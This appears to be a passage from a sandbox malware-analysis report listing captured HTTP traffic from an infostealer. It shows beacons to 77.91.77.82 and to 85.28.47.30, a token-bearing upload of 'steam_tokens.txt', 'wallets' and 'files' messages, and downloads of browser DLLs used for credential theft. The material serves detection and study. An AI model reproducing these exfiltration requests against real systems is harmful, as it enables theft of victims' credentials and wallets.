                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAEHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"wallets------CAAKKFHCFIECAAAKEGCF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJKHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 2d 2d 0d 0a Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="message"files------GCGIDGCGIEGDGDGDGHJK--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="file"------GHIDGDHCGCBAKFHIIIII--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCGHIDHCBFHIDGHCBKHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 43 47 48 49 44 48 43 42 46 48 49 44 47 48 43 42 4b 2d 2d 0d 0a Data Ascii: ------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------EBGCGHIDHCBFHIDGHCBKContent-Disposition: form-data; name="message"jbdtaijovg------EBGCGHIDHCBFHIDGHCBK--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: 